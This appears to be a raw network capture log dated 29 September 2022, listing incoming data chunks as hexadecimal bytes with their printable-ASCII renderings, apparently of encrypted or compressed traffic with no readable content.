                                                                                                                                                            2022-09-29 12:45:25 UTC34289INData Raw: c8 4c 9e c7 05 12 f7 4c b2 2a 8d ac 1b 8b 93 db e9 45 dc e8 70 07 23 9a a2 43 00 51 5f cb df db 11 2d 07 f3 69 6e 72 70 94 b4 49 5e a8 36 a6 00 60 25 71 6c f0 f0 6d 93 33 ba 8b f7 39 52 d3 b0 25 e2 32 22 70 06 c6 90 7e 0e a1 22 4a e2 6d 92 f7 64 4c 8c 1b 53 98 eb 00 96 6b 6e 81 4b ce 3a 98 55 91 3d 72 86 1e b7 c5 39 e5 c7 47 d8 f5 2a 3c 37 fa 80 a3 f6 21 f9 8f 6f ab 18 e4 4b 5d 11 88 9c e3 0a c1 51 a5 c7 f9 17 8c a6 cf 1d 76 1a e5 b8 dc c4 ae bb d4 17 07 4c f2 18 13 52 7f a0 67 79 27 5b 90 c5 e3 97 01 63 8f 43 6a d8 ae 97 48 9f 99 15 67 e9 06 7d 8d 1b 56 b9 7c 30 14 fc 6b a6 5d 2b 47 4c 06 1a 22 5e 29 46 eb 71 e3 3e da 20 56 9a 77 f7 35 1b a4 78 28 00 de a0 2d e1 84 d4 f5 41 58 65 e8 aa 31 5a dc 15 0f 21 e3 f9 e0 dd e9 98 3a b8 60 27 6d dc b8 47 df 18 8c
                                                                                                                                                            Data Ascii: LL*Ep#CQ_-inrpI^6`%qlm39R%2"p~"JmdLSknK:U=r9G*<7!oK]QvLRgy'[cCjHg}V|0k]+GL"^)Fq> Vw5x(-AXe1Z!:`'mG
                                                                                                                                                            2022-09-29 12:45:25 UTC34305INData Raw: f7 47 93 a0 95 39 7c ae 8c 5b 87 0a 6f 11 45 72 2e d9 b0 0c 51 76 d6 27 d7 d4 c1 f8 e5 2e b0 66 fd 75 e5 b3 cc 31 a9 3d 93 05 49 ff d4 ea 7c 8f 03 6f 67 c1 08 f1 5a 49 89 18 dc 6b e9 21 e9 89 22 78 be b1 5c 00 bc 79 bc e2 12 6e 53 3e 5f 5e 9f 37 23 71 bb 93 3b a3 a1 df 90 0f 0b 9a 0a ec e0 03 08 21 9a d0 d0 57 81 c6 82 0c 15 67 1a ad fe b4 7a 51 cf 6d 60 80 c8 9e 3c 5f 6f fa 72 d5 2f ec 50 ec a1 2f c1 03 3b b7 41 80 73 77 d2 b8 bb 01 48 1c 8f 0f 47 6c 31 84 b2 bc ca da ef 22 c8 fa 14 12 ae 17 0b 9f 6c 63 6e 28 de e0 7d 59 b3 31 b6 6c 2a 49 e4 a5 dd e4 73 ad af 8f c3 46 ef fa 28 b8 87 cd a0 15 9c 38 85 54 17 d6 b3 37 b2 fb 5f 71 34 ee 62 32 a8 ef 3a 3b 17 81 74 78 b1 74 34 e0 60 77 ff 80 fd ba 06 31 84 3c 56 19 fa dc ed f6 8b 67 cf 0c dc 69 4b 58 5b 25 a2
                                                                                                                                                            Data Ascii: G9|[oEr.Qv'.fu1=I|ogZIk!"x\ynS>_^7#q;!WgzQm`<_or/P/;AswHGl1"lcn(}Y1l*IsF(8T7_q4b2:;txt4`w1<VgiKX[%
                                                                                                                                                            2022-09-29 12:45:25 UTC34321INData Raw: 71 cf 05 08 f7 b3 e5 6a ab ec c7 c3 50 ff 90 82 60 ec 09 ad e6 5f 45 88 f9 02 93 5a c8 0b 2e 49 16 38 54 b2 e2 59 a2 9a df ea 63 12 7f 2b 78 18 e6 94 34 91 3f 54 82 66 ed 4d b2 25 8d ed c1 d4 b0 86 76 2c 76 64 f3 54 b9 19 7c ad d4 0d 0d 7c ea 1f 14 85 7a 0f eb 87 de 47 c3 0f 57 91 6c 25 b8 32 50 71 50 44 f7 48 09 1f 3c 29 96 16 46 6f c2 cc 5d 62 ed 8c 8c ce ac fc 0a 5e f3 01 b6 0e 3b 61 1f fd 52 9f 1b b0 ac 89 e5 15 16 bb b2 ee 0e 8d 26 fd 7c 70 05 4c f3 71 bf 03 55 5c 5b 62 af 1b 8a 17 68 df 1b 4f 9a 54 b8 e9 2e f4 44 4b 4a 75 6c fd f4 93 fd 96 ce 36 2e 15 2a 37 24 3a 4d b3 4d a2 47 45 c6 ed 7a e1 41 fb 0a 61 d2 66 39 83 a7 a7 e6 cd 26 dd 4a 7f d6 f9 1a 4a ca cc ff 7e 5e 79 cf db 9b 9f 1b 39 31 04 14 64 b3 ab 6f dd 7e 5b bf e5 12 82 bd 55 3e 97 4d 64 4f
                                                                                                                                                            Data Ascii: qjP`_EZ.I8TYc+x4?TfM%v,vdT||zGWl%2PqPDH<)Fo]b^;aR&|pLqU\[bhOT.DKJul6.*7$:MMGEzAaf9&JJ~^y91do~[U>MdO
                                                                                                                                                            2022-09-29 12:45:25 UTC34337INData Raw: 13 7d 2e 5c 5d aa fe 8c c4 8c 19 f2 4a 5e 13 cf 06 bf b0 74 11 9c b4 f7 6d fa a4 20 50 1b 20 3a d4 a7 13 1b 13 42 59 43 aa a4 fd c5 87 f8 8a fc 75 ea 4c e9 7f c3 98 1b 05 b8 86 f8 de 98 b3 0e 2d 71 f6 60 56 2c 97 ba 59 eb 27 f7 2f c1 2d b9 0b 2c 0e 0b a6 9d 4b f1 b9 45 c5 b8 9e 72 0b b6 47 c6 8e 88 d9 6c 7a e8 a4 5c ac a8 27 52 b2 16 df fa e1 a4 86 a0 a7 53 89 8e 64 2c 7d 60 e4 23 49 cd 74 cd 7e 96 77 69 3e c7 e9 80 df 18 0c a6 be d3 59 93 a3 8d 1b d9 99 fc 03 17 44 11 85 8e 9f 63 87 54 df c0 82 57 dd 37 9e 89 08 af 39 b1 d7 e6 a3 14 ec f4 16 b1 64 6b 6d cd 69 b3 13 e2 93 9d 57 b0 c9 a0 c1 04 44 fe 03 dc 6f fa b3 2e f7 e9 87 c9 be 89 47 2e 6e 95 80 1b 96 ba 62 ac ed 5e 53 ea 15 37 3f e1 15 4f 6e 64 58 fc 06 4a 0b 33 17 c6 ca 7d 75 3f ab d5 79 67 f9 6a 8a
                                                                                                                                                            Data Ascii: }.\]J^tm P :BYCuL-q`V,Y'/-,KErGlz\'RSd,}`#It~wi>YDcTW79dkmiWDo.G.nb^S7?OndXJ3}u?ygj
                                                                                                                                                            2022-09-29 12:45:25 UTC34353INData Raw: 4e c2 87 a1 fc 9e 6e 11 2c b8 97 bd c1 bf 0f 1f 3b 33 79 da 9b 3f 98 cf 08 64 61 17 68 52 bb 0d 02 63 45 d9 16 00 ba f7 d5 01 a8 88 f4 63 64 27 23 51 f6 e9 69 e6 22 c5 f6 c4 12 c5 c0 82 0f 1a 06 68 02 fc 7d 55 14 7e 60 f0 82 85 1c 0d 98 14 c6 1b 0d 9b b6 dc 1e 36 d8 29 94 8f b5 65 72 69 f7 0a e4 bd 60 ca f5 97 aa e1 a2 5c e9 99 de 6a 48 2d 49 1f 9a c8 88 d5 4d 67 fd 30 28 06 d0 d4 f2 7d 06 5b 7c e5 02 bd db c0 6b 7c d1 df 82 02 0e ba 82 fc e0 f4 28 50 59 e5 49 36 89 7e 3a 6c 68 f6 e9 e8 7c 8c 81 80 ed 86 64 59 9e 89 b1 67 28 02 58 1f 09 35 41 77 f5 db f7 13 56 54 a7 ce a4 63 3e 4f 3a 77 73 5f 4a bf ed 85 ba d5 db 7b fe 7d 80 61 89 1b 4b b8 86 8f 09 bd f5 6c 0f 57 4b 10 f0 25 9c 0d 5a 2e c6 50 99 8c 26 80 02 6c 0d 9a 27 90 f0 ce e6 12 a7 cb 71 e9 86 00 3a
                                                                                                                                                            Data Ascii: Nn,;3y?dahRcEcd'#Qi"h}U~`6)eri`\jH-IMg0(}[|k|(PYI6~:lh|dYg(X5AwVTc>O:ws_J{}aKlWK%Z.P&l'q:
                                                                                                                                                            2022-09-29 12:45:25 UTC34369INData Raw: eb 3c b4 2a 48 22 c8 43 ba 5d 25 66 e9 53 26 66 28 c8 1f b6 34 fa e1 34 a8 3c 3e 6b ad 53 6e 87 a4 9d b8 29 92 b5 27 9c 10 28 e8 e9 9e a3 74 84 06 64 01 20 86 d1 fa 5a 61 67 4f 23 a5 50 58 eb 14 20 bd 9a 7d c0 c1 cb 8d 07 fb 30 21 b9 c8 be 7e cc 0c 21 3c 61 f8 3a 89 80 92 b9 08 ba 85 32 09 d1 c1 74 ed 39 79 ab b8 92 63 26 76 e6 24 33 31 90 1c 63 2c a0 6a 61 8b 0e c2 15 b9 fb f3 b6 e4 e2 37 d0 21 45 84 f8 19 19 54 59 02 2d c3 2b 7c e0 be 59 c2 89 70 66 4f 1c e9 6b 19 0a f4 a2 a5 69 21 80 1b 82 74 1a 90 d2 ef 25 81 66 3d 2b d1 74 6a ad bc 59 48 68 bc 11 b4 91 98 27 05 31 2e f5 2a 2c b6 96 da 4e fd 76 48 34 6b ce a2 81 7d 02 c0 02 d3 57 be a1 3b b0 e9 8c dd 73 99 72 d9 35 66 62 8d 06 42 a0 e2 ec 5c 9e 65 75 77 4b 58 c9 31 95 4c 46 7f d0 6a 48 c0 77 ba fd a3
                                                                                                                                                            Data Ascii: <*H"C]%fS&f(44<>kSn)'(td ZagO#PX }0!~!<a:2t9yc&v$31c,ja7!ETY-+|YpfOki!t%f=+tjYHh'1.*,NvH4k}W;sr5fbB\euwKX1LFjHw
                                                                                                                                                            2022-09-29 12:45:25 UTC34385INData Raw: 3c 34 0d db 42 d0 c7 c5 f7 0e a8 4d 25 15 7a 66 bb dd 54 a3 7c 34 19 d5 b4 b8 18 49 95 1d 3c ec 9a 90 9f a4 dc 21 98 f0 57 92 00 6e 27 ef 9e 0f 4e 8b 4a 27 75 8c 82 ac 0a ce b3 c6 8d 67 8e bd c8 c8 83 76 63 c0 99 91 12 94 1f d5 56 06 bc 61 ae 17 d0 f8 d9 1d c4 3d a3 6b 95 b7 c6 1d e5 91 b7 01 3d 26 e0 19 f4 2e 0f de d0 37 9b fd ec bf 0c 6f c3 e9 b4 1b 2c dc 5c 2f 85 f8 c4 1d 2d d9 1a 8b 6e de 5b 9c 04 fe 74 50 4e ff 7a d5 b1 16 2a 2a 87 ee ef 98 d0 a3 c8 63 c3 51 f7 e7 b9 e5 62 9e fb b6 d2 c0 2f 1a e1 a8 74 f1 cd 15 d4 ec f0 d6 40 80 28 33 94 47 85 de db cb 33 c4 2d 20 4c 66 0d fd 62 16 d4 20 04 b8 f7 5b 70 ca f8 e9 b6 88 b9 e0 58 80 91 60 17 88 0a f7 57 a4 cf e7 e3 b0 94 92 91 9d 06 55 5d 76 04 34 2f c0 e9 6c 1c 73 a8 dc 9d 83 bd cd a7 01 bc dc 55 8d 0b
                                                                                                                                                            Data Ascii: <4BM%zfT|4I<!Wn'NJ'ugvcVa=k=&.7o,\/-n[tPNz**cQb/t@(3G3- Lfb [pX`WU]v4/lsU
                                                                                                                                                            2022-09-29 12:45:25 UTC34401INData Raw: ce 92 6e cf 00 83 74 47 d2 9d ae 25 eb 77 f0 b9 33 3d a8 12 df 33 1d e1 be 29 ed 2c df ea 9d 8b 60 55 70 6f 74 84 44 a9 6d 84 3c fc 8a 5b 22 e1 42 f1 3e fd 6f ed b1 eb a1 e3 0f 59 19 21 5b 63 57 7c 9c b6 ff 12 ab cf dc 3c 48 df 3b 94 b7 38 c3 88 2c 7a 7f b3 52 cb 50 0a c1 87 6d e8 b5 5a 0d 5c c9 c6 15 53 f0 f2 79 7d c5 68 20 88 88 c3 20 7b cc 3b 4c 7e 7f d1 bf fc 3b 77 8e 46 27 83 bb 8e 4e 2b 22 db 7e 05 32 41 c7 af 20 6e ad 31 61 b3 02 a1 ab a0 03 dd 23 a7 8d dd 5d 16 b4 a3 a3 4f b9 cf e7 13 73 12 ca 17 98 64 a7 e6 ff d1 f1 ab 2a 7a 72 b9 7b 24 23 e9 21 18 57 38 80 19 8e e3 cf 69 81 3c 0a d3 82 4b b0 ca 32 fb f2 36 75 68 63 3d 69 38 6b 2e 1a c9 f8 f1 ee c2 c2 20 92 6f 94 13 8d a7 13 e4 1d 0c 30 13 5b 26 ac 94 f4 4e d8 88 c7 8f ff 3d 6d 22 dd 2c 3a 14 6e
                                                                                                                                                            Data Ascii: ntG%w3=3),`UpotDm<["B>oY![cW|<H;8,zRPmZ\Sy}h {;L~;wF'N+"~2A n1a#]Osd*zr{$#!W8i<K26uhc=i8k. o0[&N=m",:n
                                                                                                                                                            2022-09-29 12:45:25 UTC34417INData Raw: c1 49 79 dc 70 bd 07 ed 6c 03 05 ef fb 23 21 40 c8 ee de e7 01 b1 95 3a 37 cb 15 e2 53 bf a0 29 1e 16 5f 3c 2c df fb 49 77 52 a4 82 ad d1 7b 50 1d 54 aa 8b 3e 01 6d 9f c6 52 97 a1 70 2a 06 dd 4f 26 f0 4f 79 34 50 84 09 4b d3 e5 1c 3c c4 d7 dd c5 8a 2d b4 7d 6f 22 a7 2d f0 be 3e 9b e8 1e 16 62 db 31 fd fe c6 fe f5 75 24 59 00 39 4c 16 72 c7 40 fe 89 a3 87 35 11 76 6d fd 25 69 26 26 20 7a 5d 71 c5 b5 96 63 0c 0a db 1d 05 45 4f 22 d7 aa 96 6e e1 35 cb 4a 4c 02 b7 31 bb 13 2a 01 a9 f5 22 4a 30 1f f4 ab 46 a6 f0 6c 8b 6b 1c c3 af ba 85 24 04 a5 47 c5 77 d8 bd 0c e6 27 c6 47 3c 12 42 7a 76 a2 f0 4e ae 63 c9 6f 36 f4 d8 2f b5 44 94 31 81 5d a7 45 a0 3c c4 1d e7 e0 d4 08 48 7c 12 d4 6e 5a 23 b0 75 f7 40 56 bf df 84 58 4e 82 d5 cd 94 1d c8 ca 8f 05 e3 2e 23 b6 27
                                                                                                                                                            Data Ascii: Iypl#!@:7S)_<,IwR{PT>mRp*O&Oy4PK<-}o"->b1u$Y9Lr@5vm%i&& z]qcEO"n5JL1*"J0Flk$Gw'G<BzvNco6/D1]E<H|nZ#u@VXN.#'
                                                                                                                                                            2022-09-29 12:45:25 UTC34433INData Raw: 9c 27 9a 91 df 77 a0 03 81 c8 f3 a1 d5 f8 96 63 13 49 34 2a 71 10 41 c5 f8 93 a7 97 ec 46 38 fc f4 0d 63 ac c7 5f f9 dc 21 1d 8e 03 b3 3a 7c ed d7 d4 2b 16 94 7f 98 96 d5 0e 34 b7 da 17 2f 0b fd 79 b5 5f 60 a0 d6 69 2e 65 12 7d 21 72 e2 0d 11 d9 85 f5 64 d6 b1 89 7e 01 99 3f fb 72 e0 26 7c a9 aa 2e 18 f7 a8 08 2f b5 df 2d a6 72 1c 73 9e 7c b5 51 41 2e e4 6e b9 9c 82 ef 79 54 95 45 ee 66 77 4f bf 22 ff 08 c4 b0 3f 4e f0 bf d8 3e b8 74 3b 57 cf a0 bd e7 b6 cc bd 7b df 6f 2d 69 75 41 be b6 87 b4 72 76 b6 ed e8 95 b1 44 24 df 03 ab 54 7a 10 79 23 dd 43 d5 f0 4a 23 81 89 5d 7b 81 a9 f5 64 d0 cb 8e 63 41 5f 5d a7 6d 0b b8 23 52 84 f8 3b 02 57 74 d4 48 f6 2d e1 03 df df 2e c5 63 36 a8 9f d7 9a 8b 52 8d 72 3a 89 42 3e 4b 04 ed c7 3d a0 0a 82 0e ae 3f 31 9c 71 a4
                                                                                                                                                            Data Ascii: 'wcI4*qAF8c_!:|+4/y_`i.e}!rd~?r&|./-rs|QA.nyTEfwO"?N>t;W{o-iuArvD$Tzy#CJ#]{dcA_]m#R;WtH-.c6Rr:B>K=?1q
                                                                                                                                                            2022-09-29 12:45:25 UTC34449INData Raw: 7b 57 1d fd 0c 13 c8 65 c3 fa dc 6e 96 e1 3c 96 e1 7f 46 7c e9 0d 76 b5 79 41 8d 2b e4 cc 2f 81 62 31 ee b3 3c e1 a4 0b 32 b2 c2 6e 54 12 c1 c5 05 17 87 08 6e 98 f3 b9 97 28 b0 d8 33 78 5d ba 32 5b 6e 15 1a df 8b 52 6e e6 16 72 82 a3 24 12 34 ce eb 13 86 99 ee c4 83 a7 29 d1 62 92 21 a8 53 70 bf fb be 7e 02 e1 9d f6 4f 9a 57 87 be e6 ee 04 3e 26 b9 7b bb 39 d4 82 02 6c 4d 9d 91 6a bc d7 59 c8 73 1e 9f af e8 4c 9e db e3 d0 af e5 47 5e 43 36 b8 bd b8 28 be 52 c6 7a f4 26 98 43 9c 8d 0a 92 54 e7 a2 da 4f 2b 4a f4 64 35 6a ef 94 95 e4 10 7e c8 20 22 62 e9 4c 70 f6 fc 3d 00 66 ce 7a bb 74 25 d7 d1 39 35 94 ee 94 1d 7b f2 61 2e b1 08 18 d3 90 5a 13 4a 0b 1f 9b 2a 31 60 d0 95 87 8e ed 1e 0b 00 13 83 48 57 ca 09 d0 38 9d 5f ba 12 60 c3 02 89 9d a2 ee 18 f3 49 23
                                                                                                                                                            Data Ascii: {Wen<F|vyA+/b1<2nTn(3x]2[nRnr$4)b!Sp~OW>&{9lMjYsLG^C6(Rz&CTO+Jd5j~ "bLp=fzt%95{a.ZJ*1`HW8_`I#
                                                                                                                                                            2022-09-29 12:45:25 UTC34465INData Raw: 60 d4 a3 55 c7 84 b2 8a 50 a8 34 65 d7 c2 cf 11 ac 69 5f dc 2d 64 d5 84 a1 75 20 c5 4f 8c 1d f1 22 88 fe 5a 24 2e b8 c3 9d 79 68 c6 18 03 11 47 aa 22 9b d0 e3 1a 3a bc 9e e6 8d 28 80 de fc a5 4c 2d 27 f0 10 83 4e 0c 3d a5 ef 54 d8 5a f1 f0 5c 52 66 43 b7 60 89 b3 5c d2 a6 91 13 14 8a 0e 52 68 13 53 3c 4d 70 62 45 ad 69 b5 3c 59 c3 75 ab 95 54 6e db e9 07 52 2a 6c 6c ef 84 8c 3c 6a e2 81 e4 24 a1 64 59 32 51 b5 d1 59 59 04 79 ad 27 86 a6 53 cc 46 66 ae 72 63 ef cc 4e 5a 65 07 2f 45 d9 dc e2 3d f4 d2 63 69 02 23 4b ec d4 ca f6 9e 5b b7 5e dd 2d 78 bd fb 20 5c 92 46 28 b2 23 ce a5 3a f1 53 a8 2f a4 7f f3 25 42 b7 0f 40 03 62 01 15 6a d0 2b 43 24 50 19 53 cf c4 8b 24 45 66 44 dc e2 cc f1 31 31 1c 2a 8f 0a eb 5a 57 1b 8a 6f d3 12 c7 6f 4c 1a 1b d1 b7 8b 4f 69
                                                                                                                                                            Data Ascii: `UP4ei_-du O"Z$.yhG":(L-'N=TZ\RfC`\RhS<MpbEi<YuTnR*ll<j$dY2QYYy'SFfrcNZe/E=ci#K[^-x \F(#:S/%B@bj+C$PS$EfD11*ZWooLOi
                                                                                                                                                            2022-09-29 12:45:25 UTC34481INData Raw: f5 39 1b 12 9f 07 d6 0c 89 6e f4 fb 4f 38 1d d9 fc c5 3c 4f e8 6c dd 09 05 01 44 cb 76 66 ad d5 03 f7 63 67 96 91 27 86 8d ce 62 8f 13 22 64 4c 11 3a e3 3a 7b 09 79 e6 95 1b d2 bf dc ff 27 54 68 25 a6 64 98 e5 aa 8e fb cd 48 cf f5 50 01 93 74 5c f4 f9 94 9e f2 80 39 c4 5c 98 82 e3 ba 43 b1 6f 8c 36 84 46 71 5e 89 8c 06 8b b1 e5 a5 30 34 28 be e4 f1 ab d5 32 0d 2d ff ac 17 6d 11 06 4d d4 15 cd 17 7b b1 0c 2c b4 15 ec 62 53 6b f1 94 c0 e0 ea d5 df d3 8b 18 41 e7 0d af fc 14 ab 6c e1 24 3d 4a 2b b3 c2 1d 55 b9 97 0a 79 4c 75 6f 68 d5 f6 98 6c 97 f5 19 9b 48 c1 64 65 eb 22 5a 6a 1c bd 73 4f 18 b0 ee b2 92 a7 4e 0f b0 08 00 45 26 10 32 a2 0b fe 0f 17 ca 47 0d 5d 16 9d 2b 65 02 2b 13 9d 8a 1e 48 11 54 94 c8 92 c2 f8 1e d7 78 57 df e6 84 c2 99 c7 f9 55 92 6c c1
                                                                                                                                                            Data Ascii: 9nO8<OlDvfcg'b"dL::{y'Th%dHPt\9\Co6Fq^04(2-mM{,bSkAl$=J+UyLuohlHde"ZjsONE&2G]+e+HTxWUl
                                                                                                                                                            2022-09-29 12:45:25 UTC34497INData Raw: 41 51 db 58 30 bf aa 0e 26 92 2d 50 85 fd 25 ea 76 c2 a2 db 35 20 70 99 c0 b9 64 1b ee 52 d7 2d 72 2d 16 d4 07 55 7d a5 71 81 73 00 07 32 f5 18 ef 5a 06 bc db 17 71 bb 15 bf 0e c9 e2 fb d9 f6 06 cf 60 5b fa 68 3c e3 e0 2b 54 10 d5 7f aa c5 f0 4e 78 b8 fc b6 39 5f c0 e1 42 ff dc c6 1f 4b 44 a2 d6 51 d2 e3 e3 3c 24 aa 01 de bf 6a 24 de bf 05 ed dc ad f2 42 bb 95 5b 58 7f 41 71 c8 c1 11 e4 10 fc 19 2d fe 60 72 ab 8d 9e bf 5e 2a 92 1a 20 ab 69 6d ee 44 ab b7 78 7a 56 5b 02 6d 4e f1 49 5b 78 2f a2 1d 99 c4 2f d2 f3 9c 6e d6 24 8a 89 64 50 b4 c7 eb 88 b5 47 d7 21 ff 2e 81 6a d5 1d 7f 97 38 cb 4f 77 b1 b4 d6 1f 0d e6 bf 0e e5 10 d6 54 df e6 53 4c 87 fe 46 5e 64 d5 93 f1 96 ee 35 ac bc 98 1d f8 4b e6 58 5b d5 24 94 89 a1 56 6c 68 3b 8d 00 b3 f9 16 d4 80 6a 32 95
                                                                                                                                                            Data Ascii: AQX0&-P%v5 pdR-r-U}qs2Zq`[h<+TNx9_BKDQ<$j$B[XAq-`r^* imDxzV[mNI[x//n$dPG!.j8OwTSLF^d5KX[$Vlh;j2
                                                                                                                                                            2022-09-29 12:45:25 UTC34513INData Raw: 46 8a 78 41 1e 3d f5 e6 db 3f d3 5d fd e6 2b bf 38 2a b7 e3 ab 53 17 37 35 d1 67 4b dd f9 52 a3 9f 9f 03 26 9e 27 b3 44 60 2f e8 5f 75 1c 1f c4 f4 7a 4d 20 17 95 91 04 11 40 d0 c0 38 6b a4 53 1b 8c f7 e6 69 65 b2 12 85 f5 10 5b e3 f8 84 97 c9 9a b7 55 e1 a1 fb c0 91 96 8e d2 fb 9f dc 22 06 f0 5f e2 2a 8f c8 11 41 f0 5a 39 67 c3 7e 38 e9 36 e5 23 74 1d 09 2a 36 63 a5 af 56 4e 63 9c 2a 1a 23 08 51 96 c9 19 e6 90 6c 14 10 4b 75 4b 68 4a 41 21 c1 59 e5 73 c4 c0 ac c6 b0 d1 0e fc 56 7f 08 4f fa b8 ed 8e 7f 87 7e 59 32 c1 a0 f0 bf 50 90 85 d6 5e 2b b0 c2 e4 5a eb 87 95 d4 7c 32 92 16 47 47 96 2e fe 54 f1 b4 d9 8c 86 e3 93 bf 20 a7 d8 24 60 52 8d 72 09 8d d3 e4 aa 85 59 ba aa 61 db ab 33 7e ec 30 da 1d 7f a4 d5 1c 0b 21 c3 53 2a f9 34 88 7f c5 6c a7 69 54 4a d5
                                                                                                                                                            Data Ascii: FxA=?]+8*S75gKR&'D`/_uzM @8kSie[U"_*AZ9g~86#t*6cVNc*#QlKuKhJA!YsVO~Y2P^+Z|2GG.T $`RrYa3~0!S*4liTJ
                                                                                                                                                            2022-09-29 12:45:25 UTC34522INData Raw: 40 e7 c4 ab c7 da 8c 98 37 82 53 b6 ed 38 75 89 9e 54 f4 88 c7 6d 53 79 24 a8 2f a5 ff f8 7e 58 7b ba dc 80 30 58 cc ca a6 f3 4b f8 f7 f5 f5 a6 2d dc 4a 83 b3 bc c4 6d 5c 18 5e f2 a1 3f a5 3c 92 ff b3 c0 38 77 8e c6 8d a3 7b 0b 8e 61 3f 51 ab 13 85 25 29 00 f5 f3 43 f4 a5 42 fa 48 14 a4 41 4f da df b2 34 0c c6 9e 9b 87 63 db 66 03 4b c7 89 50 a9 61 2c 47 07 4b 4d 46 2b 22 10 f8 0f 79 ce eb 26 a1 b1 83 03 47 2e fc ef e7 d1 3a 65 b2 57 18 56 82 6a da fd 61 54 12 59 10 a5 22 37 dd d0 37 73 a0 bc 79 00 a1 fb 28 0a 9b ef 40 d8 c2 1c 88 65 7a 4a 30 70 2b d1 f6 54 1e d5 f5 21 b3 20 df 46 c5 1b 29 1f e3 f9 be 32 50 62 52 9e 56 b2 a0 4c 23 80 4c 10 e7 c5 cc df 8c 5c 63 73 35 d2 8a 08 15 ba 07 ac 34 ec 35 67 fc 9f c0 48 e0 87 99 e3 df d8 79 72 38 06 e8 5d c6 31 0d
                                                                                                                                                            Data Ascii: @7S8uTmSy$/~X{0XK-Jm\^?<8w{a?Q%)CBHAO4cfKPa,GKMF+"y&G.:eWVjaTY"77sy(@ezJ0p+T! F)2PbRVL#L\cs545gHyr8]1
                                                                                                                                                            2022-09-29 12:45:25 UTC34538INData Raw: b2 47 48 9b 9f 25 e7 41 b3 4a 1b ab 47 53 de cd 05 c4 fe e4 51 24 15 30 84 06 26 41 55 ee 13 8d 5e af 53 12 8a 96 7c e8 11 d0 0e 5e dc d2 a9 6a 59 d0 da 31 ad de 0a b4 35 f1 51 7f 33 db fb 00 64 cc 19 c8 ec 38 b4 df d1 5d b8 09 1e 79 d8 78 7c af a3 b2 8d 62 88 ff 76 d2 d2 98 46 62 c2 7f 35 00 46 4d 90 e7 33 3a 9b a7 28 80 52 70 43 a4 df 26 a8 56 0d 9a 70 5e 30 e7 59 e7 70 93 8a b9 66 e1 6c 24 10 e1 d1 b6 bc 6f 8a e0 32 df d3 8b 2d 67 dd 85 86 ac 28 d9 12 ce 64 f4 0a 7d b8 30 9f 9d 30 c7 a0 79 5f 33 fd f6 f6 29 41 11 fa f3 5c 42 99 fd 7e 68 2a d0 f6 8a e0 fe 77 57 9f f3 58 45 b2 e2 ff b9 9b 3b 72 6d 97 08 85 55 31 6f 28 4a 69 af ea 76 8a 55 1b 9d 25 eb 42 dd be 4f 7e 1e 05 47 fd 00 0e 62 f5 0d 34 3e 88 ec 2a 7c a1 0a 7d a6 88 5f 01 86 3f fe d0 58 9c 3e a6
                                                                                                                                                            Data Ascii: GH%AJGSQ$0&AU^S|^jY15Q3d8]yx|bvFb5FM3:(RpC&Vp^0Ypfl$o2-g(d}00y_3)A\B~h*wWXE;rmU1o(JivU%BO~Gb4>*|}_?X>
                                                                                                                                                            2022-09-29 12:45:25 UTC34554INData Raw: 4a 25 e2 71 0f a0 fc 63 73 49 a5 bb 4c 0a 48 7e 92 c0 9d 39 7c 89 2f bd 76 a7 1f af 27 9e 2a df f3 57 d5 8b 58 04 40 cb 7f 98 ef c1 f5 bb 1f 50 36 37 f8 b1 ba 8d 46 b6 1f 54 f5 c5 cd 22 cb 67 1b 7f 64 76 37 37 68 bf 51 f9 7f 2d 9d 7f 55 21 ac ba b4 79 84 dd fb 24 d5 99 63 c4 6e 05 54 80 2b bf 8e 98 fd 20 6a 8f b1 13 77 cd 2a 46 4c ff 68 2f e0 13 b1 78 df e8 60 a6 4b a5 9f 1f 22 23 10 1a e0 46 8b cb 39 6f f5 69 af 61 e0 91 b8 d2 db 1a a0 70 74 93 83 ab 53 6d 15 27 9a 99 ff 2e a3 0b 48 49 99 d6 03 8a d7 95 fb 9a a0 d6 fd 2a 00 02 a3 ae 54 6c 28 3a 13 08 ca 84 16 80 e0 73 d8 8f 05 99 46 52 f8 85 e8 45 06 75 c3 67 de 3b 41 a5 87 28 9c b2 8d b5 0b 3d c3 e0 cf 34 13 d2 f4 77 90 81 00 2e 49 19 17 e1 90 69 3a 10 af 22 01 e8 bc cd 36 d6 29 d1 b5 a9 21 1e c6 8b cb
                                                                                                                                                            Data Ascii: J%qcsILH~9|/v'*WX@P67FT"gdv77hQ-U!y$cnT+ jw*FLh/x`K"#F9oiaptSm'.HI*Tl(:sFREug;A(=4w.Ii:"6)!
                                                                                                                                                            2022-09-29 12:45:25 UTC34570INData Raw: 8c 01 f1 40 ae e4 18 1e 26 9d bb f4 d6 ca eb 4d 62 e9 b6 05 e5 61 b7 c1 f6 ab e5 8d 4f f4 82 cc 37 20 a1 0f bb da eb 64 68 57 2a b7 e8 85 9f 34 05 5e 33 c5 c1 0b 54 9d 92 e2 01 3d b4 23 a1 cc f9 67 44 8e d6 ac 79 0f f1 0f b5 41 f0 6a 65 eb 81 04 8a c6 5d e5 bf 14 d1 12 09 8e 01 03 30 d6 49 bd e7 12 81 5b c4 04 3b 8e 8a d3 0d a4 15 22 5e b5 58 52 6f c6 bb bb 88 28 df 36 76 c2 dd 9d 87 c5 d5 8f 3a ce c4 a9 50 6d 3b 7b c8 1d db e7 e4 5c 31 b8 72 a5 24 e7 22 c6 8c a8 f2 5b af 28 d8 64 d3 6c e1 81 84 e4 b6 1f 90 af fb b1 e6 62 a2 5b ce a6 e9 2d bb 15 48 83 71 ac 5b 8d 6c 2e 5e 81 e6 0c e3 9f e7 eb 20 c2 a3 18 e6 8c ee 8e d8 d0 4e 1b 2e 62 40 28 b7 42 4c 51 ea 38 39 38 af 11 2f 8a 33 ff 08 f1 a0 91 ec aa b9 e5 ca 0b 35 9f 4f 27 f3 42 a1 22 2a 71 2f 7c d7 45 5b
                                                                                                                                                            Data Ascii: @&MbaO7 dhW*4^3T=#gDyAje]0I[;"^XRo(6v:Pm;{\1r$"[(dlb[-Hq[l.^ N.b@(BLQ898/35O'B"*q/|E[
